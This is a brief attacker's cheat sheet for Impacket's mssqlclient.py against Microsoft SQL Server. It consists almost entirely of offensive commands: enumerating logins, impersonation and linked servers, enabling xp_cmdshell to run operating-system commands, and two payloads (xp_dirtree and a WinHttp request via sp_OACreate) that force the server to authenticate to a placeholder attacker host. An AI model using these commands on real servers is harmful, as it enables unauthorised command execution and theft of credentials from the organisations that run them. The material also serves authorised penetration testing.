#
mssqlclient.py
Great for enumerating/attacking SQL server. This article was very helpful in putting together this cheat sheet.
#
Basic command to connect to a SQL server
mssqlclient.py user@host -port 123
#
Connect to SQL server with a domain account and non-standard port
mssqlclient.py domain.com/user@sql1.domain.com -p 123 -windows-auth
#
Enum logins
enum_logins
#
Enumerate impersonation values
enum_impersonate
#
Enumerate linked SQL servers
enum_links
#
Enable XP_CMDSHELL
enable_xp_cmdshell
#
Run command using XP_CMDSHELL
xp_cmdshell whoami
#
Coerce an SMB connection to an attacker system using XP_DIRTREEE
EXEC xp_dirtree '\\YOUR.ATTACKING.IP.ADDRESS\doesntmatter';
#
Coerce an HTTP connection to your attacker system:
DECLARE @o INT; EXEC sp_OACreate 'WinHttp.WinHttpRequest.5.1', @o OUT; EXEC sp_OAMethod @o, 'open', NULL, 'GET', 'http://DNS-NAME-OF-YOUR-ATTACK-BOX', 'false'; EXEC sp_OAMethod @o, 'SetAutoLogonPolicy', NULL, 0; EXEC sp_OAMethod @o, 'send'; EXEC sp_OADestroy @o;